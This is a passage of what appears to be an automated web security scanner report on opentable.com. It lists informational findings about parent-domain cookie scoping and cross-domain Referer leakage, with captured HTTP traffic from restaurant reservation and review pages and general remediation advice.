Path:   /restaurant-search.aspx

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /restaurant-search.aspx?startDate=10%2F03%2F2011&ResTime=7%3A00+PM&PartySize=2&PartySizeFake=2+People&RestaurantID=90&rid=90&GeoID=4&txtDateFormat=MM%2Fdd%2Fyyyy&RestaurantReferralID=90 HTTP/1.1
Host: www.opentable.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.grandcafe-sf.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: pgseq=; ftc=x=10%2f03%2f2011+15%3a53%3a35&p1=220&p1q=rid%3d90%26restref%3d90%26bgcolor%3de3d4a4%26titlecolor%3d000000%26subtitlecolor%3d000000%26btnbgimage%3dhttp%253a%252f%252fwww.opentable.com%252ffrontdoor%252fimg%252fot_btn_black.png%26otlink%3dFFFFFF%26icon%3ddark%26mode%3dshort&c=0; lsCKE=ors=otrestref; s_vi=[CS]v1|2744D82905163E7C-40000198C000C552[CE]

Response

HTTP/1.1 302 Found
Date: Mon, 03 Oct 2011 12:54:44 GMT
Server: Microsoft-IIS/6.0
P3P: CP="CAO PSA OUR"
Etag:
X-OpenTableHost: SC-NA-WEB-01
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@opentable.com" on "2008.12.01T18:21-0800" exp "2035.12.31T12:00-0800" r (v 0 s 0 n 0 l 0))
X-AspNet-Version: 2.0.50727
Location: http://www.opentable.com/interim.aspx?rid=90&restref=90&m=4&t=single&p=2&d=10/3/2011 7:00 PM&rtype=ism_mod
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:44 GMT; path=/
Set-Cookie: ftc=x=10%2f03%2f2011+15%3a54%3a44&p1=164&p1q=startDate%3d10%252f03%252f2011%26ResTime%3d7%253a00%2bPM%26PartySize%3d2%26PartySizeFake%3d2%2bPeople%26RestaurantID%3d90%26rid%3d90%26GeoID%3d4%26txtDateFormat%3dMM%252fdd%252fyyyy%26RestaurantReferralID%3d90&c=0; domain=.opentable.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 247

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="http://www.opentable.com/interim.aspx?rid=90&amp;restref=90&amp;m=4&amp;t=single&amp;p=2&amp;d=10/3/2011 7:00 PM&amp;
...[SNIP]...

6. Cross-domain Referer leakage  previous  next
There are 4 instances of this issue:

Issue background

When a web browser makes a request for a resource, it typically adds an HTTP header, called the "Referer" header, indicating the URL of the resource from which the request originated. This occurs in numerous situations, for example when a web page loads an image or script, or when a user clicks on a link or submits a form.

If the resource being requested resides on a different domain, then the Referer header is still generally included in the cross-domain request. If the originating URL contains any sensitive information within its query string, such as a session token, then this information will be transmitted to the other domain. If the other domain is not fully trusted by the application, then this may lead to a security compromise.

You should review the contents of the information being transmitted to other domains, and also determine whether those domains are fully trusted by the originating application.

Today's browsers may withhold the Referer header in some situations (for example, when loading a non-HTTPS resource from a page that was loaded over HTTPS, or when a Refresh directive is issued), but this behaviour should not be relied upon to protect the originating URL from disclosure.

Note also that if users can author content within the application then an attacker may be able to inject links referring to a domain they control in order to capture data from URLs used within the application.

Issue remediation

The application should never transmit any sensitive information within the URL query string. In addition to being leaked in the Referer header, such information may be logged in various locations and may be visible on-screen to untrusted parties.


6.1. http://www.opentable.com/frontdoor/default.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.opentable.com
Path:   /frontdoor/default.aspx

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /frontdoor/default.aspx?rid=90&restref=90&bgcolor=e3d4a4&titlecolor=000000&subtitlecolor=000000&btnbgimage=http://www.opentable.com/frontdoor/img/ot_btn_black.png&otlink=FFFFFF&icon=dark&mode=short HTTP/1.1
Host: www.opentable.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.grandcafe-sf.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Date: Mon, 03 Oct 2011 12:53:35 GMT
Pragma: no-cache
Content-Type: text/javascript; charset=utf-8
Expires: -1
Server: Microsoft-IIS/6.0
P3P: CP="CAO PSA OUR"
X-OpenTableHost: SC-NA-WEB-01
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@opentable.com" on "2008.12.01T18:21-0800" exp "2035.12.31T12:00-0800" r (v 0 s 0 n 0 l 0))
X-AspNet-Version: 2.0.50727
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:53:35 GMT; path=/
Set-Cookie: ftc=x=10%2f03%2f2011+15%3a53%3a35&p1=220&p1q=rid%3d90%26restref%3d90%26bgcolor%3de3d4a4%26titlecolor%3d000000%26subtitlecolor%3d000000%26btnbgimage%3dhttp%253a%252f%252fwww.opentable.com%252ffrontdoor%252fimg%252fot_btn_black.png%26otlink%3dFFFFFF%26icon%3ddark%26mode%3dshort&c=0; domain=.opentable.com; path=/
Vary: Accept-Encoding
Content-Length: 64483

document.write("<link href=\"http://www.opentable.com/frontdoor/css/ot_short.css?v=Web_11_10_0_11.prod.com\" rel=\"styleSheet\" type=\"text/css\" /><!--[if IE]><link type=\"text/css\" href=\"http://ww
...[SNIP]...
<noscript><a href="http://www.omniture.com" title="Web Analytics"><img src="http://o.opentable.com/b/ss/otrestref/1/H.22.1--NS/0" height="1" width="1" border="0" alt="" />
...[SNIP]...

6.2. http://www.opentable.com/interim.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.opentable.com
Path:   /interim.aspx

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /interim.aspx?rid=90&restref=90&m=4&t=single&p=2&d=10/3/2011%207:00%20PM&rtype=ism_mod HTTP/1.1
Host: www.opentable.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.grandcafe-sf.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: lsCKE=ors=otrestref; s_vi=[CS]v1|2744D82905163E7C-40000198C000C552[CE]; pgseq=; ftc=x=10%2f03%2f2011+15%3a54%3a43&p1=164&p1q=startDate%3d10%252f03%252f2011%26ResTime%3d7%253a00%2bPM%26PartySize%3d2%26PartySizeFake%3d2%2bPeople%26RestaurantID%3d90%26rid%3d90%26GeoID%3d4%26txtDateFormat%3dMM%252fdd%252fyyyy%26RestaurantReferralID%3d90&c=0

Response

HTTP/1.1 200 OK
Cache-Control: private
Date: Mon, 03 Oct 2011 12:54:44 GMT
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
P3P: CP="CAO PSA OUR"
X-OpenTableHost: SC-NA-WEB-04
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@opentable.com" on "2008.12.01T18:18-0800" exp "2035.12.31T12:00-0800" r (v 0 s 0 n 0 l 0))
X-AspNet-Version: 2.0.50727
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:44 GMT; path=/
Set-Cookie: restrefwhite=90; domain=.opentable.com; path=/
Set-Cookie: ftc=x=10%2f03%2f2011+15%3a54%3a44&p1=164&p1q=startDate%3d10%252f03%252f2011%26ResTime%3d7%253a00%2bPM%26PartySize%3d2%26PartySizeFake%3d2%2bPeople%26RestaurantID%3d90%26rid%3d90%26GeoID%3d4%26txtDateFormat%3dMM%252fdd%252fyyyy%26RestaurantReferralID%3d90&c=1&rr1=90&rr2=90&er=0&hr=http://www.grandcafe-sf.com/&tp=136; domain=.opentable.com; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:44 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:44 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:44 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:44 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:44 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:44 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:44 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:44 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:44 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:44 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:44 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:44 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:44 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:44 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:44 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:44 GMT; path=/
Vary: Accept-Encoding
Content-Length: 5566


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head><meta http-equiv="content-type" content="text/html; chars
...[SNIP]...
<noscript><a href="http://www.omniture.com" title="Web Analytics"><img src="http://o.opentable.com/b/ss/otrestref/1/H.22.1--NS/0" height="1" width="1" border="0" alt="" />
...[SNIP]...

6.3. http://www.opentable.com/jaspers-corner-tap-and-kitchen  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.opentable.com
Path:   /jaspers-corner-tap-and-kitchen

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /jaspers-corner-tap-and-kitchen?rid=200&restref=200 HTTP/1.1
Host: www.opentable.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.kimptonhotels.com/restaurants/restaurant-reservations.aspx
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2744D82905163E7C-40000198C000C552[CE]; s_cc=true; s_nr=1317646509630-New; s_sq=%5B%5BB%5D%5D; restrefwhite=90; ftc=x=10%2f03%2f2011+15%3a54%3a50&p1=164&p1q=startDate%3d10%252f03%252f2011%26ResTime%3d7%253a00%2bPM%26PartySize%3d2%26PartySizeFake%3d2%2bPeople%26RestaurantID%3d90%26rid%3d90%26GeoID%3d4%26txtDateFormat%3dMM%252fdd%252fyyyy%26RestaurantReferralID%3d90&c=1&rr1=90&rr2=90&er=90&hr=http://www.grandcafe-sf.com/&tp=153; lvCKE=tr=0&ts=0&g=02111003055450025564&vbefres=0&vbefreg=0&abnsh=191%2c181&any=0; lsCKE=ors=otrestref&cbref=1&restref=90&m=4&vbefres=1&vbefreg=1&hp=Jg8zl6%2fIssb0Gugv%2bBYb2g%3d%3d&ts=1&st=5; pgseq=

Response

HTTP/1.1 200 OK
Cache-Control: private
Date: Mon, 03 Oct 2011 12:54:50 GMT
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
P3P: CP="CAO PSA OUR"
X-OpenTableHost: SC-NA-WEB-01
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@opentable.com" on "2008.12.01T18:21-0800" exp "2035.12.31T12:00-0800" r (v 0 s 0 n 0 l 0))
X-AspNet-Version: 2.0.50727
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:50 GMT; path=/
Set-Cookie: restrefwhite=200; domain=.opentable.com; path=/
Set-Cookie: ftc=x=10%2f03%2f2011+15%3a54%3a50&p1q=rid%3d200%26rid%3d200%26restref%3d200&c=1&er=90&hr=http://www.grandcafe-sf.com/&tp=153&p1=117&rr1=200&rr2=200; domain=.opentable.com; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:50 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:50 GMT; path=/
Set-Cookie: lsCKE=ors=otrestref&cbref=1&vbefres=1&vbefreg=1&js=0&m=4&restref=200; domain=.opentable.com; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:50 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:50 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:50 GMT; path=/
Set-Cookie: lsCKE=ors=otrestref&cbref=1&vbefres=1&vbefreg=1&js=0&m=4&restref=200; domain=.opentable.com; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:50 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:50 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:50 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:50 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:50 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:50 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:50 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:50 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:50 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:50 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:50 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:50 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:50 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:50 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:50 GMT; path=/
Set-Cookie: jslt=DhNUH7QEwV0b0tKkwEp2937edj1JsmX2; domain=.opentable.com; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:50 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:50 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:50 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:50 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:50 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:50 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:50 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:50 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:50 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:50 GMT; path=/
Vary: Accept-Encoding
Content-Length: 199696


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en" xmlns
...[SNIP]...
<dt id="RestaurantProfile_RestaurantProfileToolbar_toolbarMap" class="mapIcon">
               <a id="RestaurantProfile_RestaurantProfileToolbar_linkMapLink" class="mapIconLink" rel="nofollow" href="http://maps.google.com/?hl=en&amp;ie=UTF-8&amp;oe=UTF-8&amp;q=401+Taylor+St.,San+Francisco,CA,94102" target="_blank"></a>
           </dt>
           <dd id="RestaurantProfile_RestaurantProfileToolbar_toolbarMapLink" class="map">    
               <a id="RestaurantProfile_RestaurantProfileToolbar_linkMapLinkText" class="ToolbarLinkText" rel="nofollow" href="http://maps.google.com/?hl=en&amp;ie=UTF-8&amp;oe=UTF-8&amp;q=401+Taylor+St.,San+Francisco,CA,94102" target="_blank">Map</a>
...[SNIP]...
</b>: <a href=http://www.jasperscornertap.com/ target=_new>http://www.jasperscornertap.com/</a>
...[SNIP]...
<dd class="last"><a href="http://www.zagat.com/verticals/PropertyDetails.aspx?VID=8&R=47889" rel="nofollow" target=_NEW>Read Member Reviews</a>
...[SNIP]...
<dd class="last"><a href="http://sfgate.com/cgi-bin/article.cgi?f=/c/a/2000/03/26/PK107832.DTL" rel="nofollow" target=_NEW>Chronicle Restaurant Review</a>
...[SNIP]...
<dd class="last"><a href="http://www.gayot.com/restaurants/ponzu-san-francisco-ca-94102_3sf00963.html" target=_NEW>Read Gayot Review</a>
...[SNIP]...
<dd class="last"><a href="http://yellowpages.aol.com/business/ca/san-francisco/ponzu/0-100923534/" rel="nofollow" target=_NEW>View ratings and see what's nearby</a>
...[SNIP]...
<div class="BVRRRatingNormalImage"> <img src="http://opentable.ugc.bazaarvoice.com/0938/3_8/5/rating.gif" alt="3.8 / 5" title="3.8 / 5"/>
</div>
...[SNIP]...
<a name="BV_TrackingTag_Rating_Summary_1_ExpandHistogram_200" target="_blank" href="http://reviews.opentable.com/0938/200/ratingsnapshot.htm"> <img src="http://opentable.ugc.bazaarvoice.com/static/0938/openRatingsHistogram.gif" alt="Open Ratings Snapshot" />
</a>
...[SNIP]...
<div class="BVRRRatingNormalImage"> <img src="http://opentable.ugc.bazaarvoice.com/0938/3_7/5/ratingSecondary.gif" alt="3.7 / 5" title="3.7 / 5"/>
</div>
...[SNIP]...
<div class="BVRRRatingNormalImage"> <img src="http://opentable.ugc.bazaarvoice.com/0938/4_1/5/ratingSecondary.gif" alt="4.1 / 5" title="4.1 / 5"/>
</div>
...[SNIP]...
<div class="BVRRRatingNormalImage"> <img src="http://opentable.ugc.bazaarvoice.com/0938/3_5/5/ratingSecondary.gif" alt="3.5 / 5" title="3.5 / 5"/>
</div>
...[SNIP]...
<div class="BVRRRatingSliderImage"> <img src="http://opentable.ugc.bazaarvoice.com/0938/2_5/3/ratingSlider.gif" alt="2.5 / 3" title="2.5 / 3" />
</div>
...[SNIP]...
<div class="BVRRRatingNormalImage"> <img src="http://opentable.ugc.bazaarvoice.com/0938/3_8/5/rating.gif" alt="3.8 / 5" title="3.8 / 5"/>
</div>
...[SNIP]...
<a name="BV_TrackingTag_Rating_Summary_2_ExpandHistogram_200" target="_blank" href="http://reviews.opentable.com/0938/200/ratingsnapshot.htm"> <img src="http://opentable.ugc.bazaarvoice.com/static/0938/openRatingsHistogram.gif" alt="Open Ratings Snapshot" />
</a>
...[SNIP]...
<div class="BVRRRatingNormalImage"> <img src="http://opentable.ugc.bazaarvoice.com/0938/3_7/5/ratingSecondary.gif" alt="3.7 / 5" title="3.7 / 5"/>
</div>
...[SNIP]...
<div class="BVRRRatingNormalImage"> <img src="http://opentable.ugc.bazaarvoice.com/0938/4_1/5/ratingSecondary.gif" alt="4.1 / 5" title="4.1 / 5"/>
</div>
...[SNIP]...
<div class="BVRRRatingNormalImage"> <img src="http://opentable.ugc.bazaarvoice.com/0938/3_5/5/ratingSecondary.gif" alt="3.5 / 5" title="3.5 / 5"/>
</div>
...[SNIP]...
<div class="BVRRRatingSliderImage"> <img src="http://opentable.ugc.bazaarvoice.com/0938/2_5/3/ratingSlider.gif" alt="2.5 / 3" title="2.5 / 3" />
</div>
...[SNIP]...
<div class="BVRRRatingNormalImage"> <img src="http://opentable.ugc.bazaarvoice.com/0938/3_0/5/rating.gif" alt="3 / 5" title="3 / 5"/>
</div>
...[SNIP]...
<div class="BVRRRatingNormalImage"> <img src="http://opentable.ugc.bazaarvoice.com/0938/4_0/5/ratingSecondary.gif" alt="4 / 5" title="4 / 5"/>
</div>
...[SNIP]...
<div class="BVRRRatingNormalImage"> <img src="http://opentable.ugc.bazaarvoice.com/0938/2_0/5/ratingSecondary.gif" alt="2 / 5" title="2 / 5"/>
</div>
...[SNIP]...
<div class="BVRRRatingNormalImage"> <img src="http://opentable.ugc.bazaarvoice.com/0938/4_0/5/ratingSecondary.gif" alt="4 / 5" title="4 / 5"/>
</div>
...[SNIP]...
<div class="BVRRRatingSliderImage"> <img src="http://opentable.ugc.bazaarvoice.com/0938/3_0/3/ratingSlider.gif" alt="Energetic" title="Energetic" />
</div>
...[SNIP]...
book&amp;url=http%3A%2F%2Freviews.opentable.com%2F0938%2F200%2Freviews.htm%3FreviewID%3D24524488&amp;title=__TITLE__&amp;robot=__ROBOT__" onmouseover="this.href=bvReplaceTokensInSocialURL(this.href);"><img width="16"
height="16"
class="BVRRSocialBookmarkLinkImage"
src="http://opentable.ugc.bazaarvoice.com/static/0938/link-facebook.gif"
alt="Facebook"
title="Add to Facebook"/>
</a>
...[SNIP]...
<div class="BVRRRatingNormalImage"> <img src="http://opentable.ugc.bazaarvoice.com/0938/4_0/5/rating.gif" alt="4 / 5" title="4 / 5"/>
</div>
...[SNIP]...
<span class="BVRRLinkSpan"><img src="http://opentable.ugc.bazaarvoice.com/static/0938/noAvatar.gif" alt="Customer Avatar" title="Customer Avatar"/></span>
...[SNIP]...
<div class="BVRRRatingNormalImage"> <img src="http://opentable.ugc.bazaarvoice.com/0938/4_0/5/ratingSecondary.gif" alt="4 / 5" title="4 / 5"/>
</div>
...[SNIP]...
<div class="BVRRRatingNormalImage"> <img src="http://opentable.ugc.bazaarvoice.com/0938/4_0/5/ratingSecondary.gif" alt="4 / 5" title="4 / 5"/>
</div>
...[SNIP]...
<div class="BVRRRatingNormalImage"> <img src="http://opentable.ugc.bazaarvoice.com/0938/4_0/5/ratingSecondary.gif" alt="4 / 5" title="4 / 5"/>
</div>
...[SNIP]...
<div class="BVRRRatingSliderImage"> <img src="http://opentable.ugc.bazaarvoice.com/0938/2_0/3/ratingSlider.gif" alt="Moderate" title="Moderate" />
</div>
...[SNIP]...
book&amp;url=http%3A%2F%2Freviews.opentable.com%2F0938%2F200%2Freviews.htm%3FreviewID%3D24480565&amp;title=__TITLE__&amp;robot=__ROBOT__" onmouseover="this.href=bvReplaceTokensInSocialURL(this.href);"><img width="16"
height="16"
class="BVRRSocialBookmarkLinkImage"
src="http://opentable.ugc.bazaarvoice.com/static/0938/link-facebook.gif"
alt="Facebook"
title="Add to Facebook"/>
</a>
...[SNIP]...
<div class="BVRRRatingNormalImage"> <img src="http://opentable.ugc.bazaarvoice.com/0938/5_0/5/rating.gif" alt="5 / 5" title="5 / 5"/>
</div>
...[SNIP]...
<span class="BVRRLinkSpan"><img src="http://opentable.ugc.bazaarvoice.com/static/0938/noAvatar.gif" alt="Customer Avatar" title="Customer Avatar"/></span>
...[SNIP]...
<div class="BVRRRatingNormalImage"> <img src="http://opentable.ugc.bazaarvoice.com/0938/4_0/5/ratingSecondary.gif" alt="4 / 5" title="4 / 5"/>
</div>
...[SNIP]...
<div class="BVRRRatingNormalImage"> <img src="http://opentable.ugc.bazaarvoice.com/0938/5_0/5/ratingSecondary.gif" alt="5 / 5" title="5 / 5"/>
</div>
...[SNIP]...
<div class="BVRRRatingNormalImage"> <img src="http://opentable.ugc.bazaarvoice.com/0938/4_0/5/ratingSecondary.gif" alt="4 / 5" title="4 / 5"/>
</div>
...[SNIP]...
<div class="BVRRRatingSliderImage"> <img src="http://opentable.ugc.bazaarvoice.com/0938/2_0/3/ratingSlider.gif" alt="Moderate" title="Moderate" />
</div>
...[SNIP]...
book&amp;url=http%3A%2F%2Freviews.opentable.com%2F0938%2F200%2Freviews.htm%3FreviewID%3D24321913&amp;title=__TITLE__&amp;robot=__ROBOT__" onmouseover="this.href=bvReplaceTokensInSocialURL(this.href);"><img width="16"
height="16"
class="BVRRSocialBookmarkLinkImage"
src="http://opentable.ugc.bazaarvoice.com/static/0938/link-facebook.gif"
alt="Facebook"
title="Add to Facebook"/>
</a>
...[SNIP]...
<div class="BVRRRatingNormalImage"> <img src="http://opentable.ugc.bazaarvoice.com/0938/5_0/5/rating.gif" alt="5 / 5" title="5 / 5"/>
</div>
...[SNIP]...
<span class="BVRRLinkSpan"><img src="http://opentable.ugc.bazaarvoice.com/static/0938/noAvatar.gif" alt="Customer Avatar" title="Customer Avatar"/></span>
...[SNIP]...
<div class="BVRRRatingNormalImage"> <img src="http://opentable.ugc.bazaarvoice.com/0938/5_0/5/ratingSecondary.gif" alt="5 / 5" title="5 / 5"/>
</div>
...[SNIP]...
<div class="BVRRRatingNormalImage"> <img src="http://opentable.ugc.bazaarvoice.com/0938/5_0/5/ratingSecondary.gif" alt="5 / 5" title="5 / 5"/>
</div>
...[SNIP]...
<div class="BVRRRatingNormalImage"> <img src="http://opentable.ugc.bazaarvoice.com/0938/5_0/5/ratingSecondary.gif" alt="5 / 5" title="5 / 5"/>
</div>
...[SNIP]...
<div class="BVRRRatingSliderImage"> <img src="http://opentable.ugc.bazaarvoice.com/0938/3_0/3/ratingSlider.gif" alt="Energetic" title="Energetic" />
</div>
...[SNIP]...
book&amp;url=http%3A%2F%2Freviews.opentable.com%2F0938%2F200%2Freviews.htm%3FreviewID%3D24052481&amp;title=__TITLE__&amp;robot=__ROBOT__" onmouseover="this.href=bvReplaceTokensInSocialURL(this.href);"><img width="16"
height="16"
class="BVRRSocialBookmarkLinkImage"
src="http://opentable.ugc.bazaarvoice.com/static/0938/link-facebook.gif"
alt="Facebook"
title="Add to Facebook"/>
</a>
...[SNIP]...
<div class="BVRRRatingNormalImage"> <img src="http://opentable.ugc.bazaarvoice.com/0938/3_0/5/rating.gif" alt="3 / 5" title="3 / 5"/>
</div>
...[SNIP]...
<span class="BVRRLinkSpan"><img src="http://opentable.ugc.bazaarvoice.com/static/0938/noAvatar.gif" alt="Customer Avatar" title="Customer Avatar"/></span>
...[SNIP]...
<div class="BVRRRatingNormalImage"> <img src="http://opentable.ugc.bazaarvoice.com/0938/3_0/5/ratingSecondary.gif" alt="3 / 5" title="3 / 5"/>
</div>
...[SNIP]...
<div class="BVRRRatingNormalImage"> <img src="http://opentable.ugc.bazaarvoice.com/0938/4_0/5/ratingSecondary.gif" alt="4 / 5" title="4 / 5"/>
</div>
...[SNIP]...
<div class="BVRRRatingNormalImage"> <img src="http://opentable.ugc.bazaarvoice.com/0938/3_0/5/ratingSecondary.gif" alt="3 / 5" title="3 / 5"/>
</div>
...[SNIP]...
<div class="BVRRRatingSliderImage"> <img src="http://opentable.ugc.bazaarvoice.com/0938/2_0/3/ratingSlider.gif" alt="Moderate" title="Moderate" />
</div>
...[SNIP]...
book&amp;url=http%3A%2F%2Freviews.opentable.com%2F0938%2F200%2Freviews.htm%3FreviewID%3D23810517&amp;title=__TITLE__&amp;robot=__ROBOT__" onmouseover="this.href=bvReplaceTokensInSocialURL(this.href);"><img width="16"
height="16"
class="BVRRSocialBookmarkLinkImage"
src="http://opentable.ugc.bazaarvoice.com/static/0938/link-facebook.gif"
alt="Facebook"
title="Add to Facebook"/>
</a>
...[SNIP]...
<div class="BVRRRatingNormalImage"> <img src="http://opentable.ugc.bazaarvoice.com/0938/5_0/5/rating.gif" alt="5 / 5" title="5 / 5"/>
</div>
...[SNIP]...
<div class="BVRRRatingNormalImage"> <img src="http://opentable.ugc.bazaarvoice.com/0938/5_0/5/ratingSecondary.gif" alt="5 / 5" title="5 / 5"/>
</div>
...[SNIP]...
<div class="BVRRRatingNormalImage"> <img src="http://opentable.ugc.bazaarvoice.com/0938/5_0/5/ratingSecondary.gif" alt="5 / 5" title="5 / 5"/>
</div>
...[SNIP]...
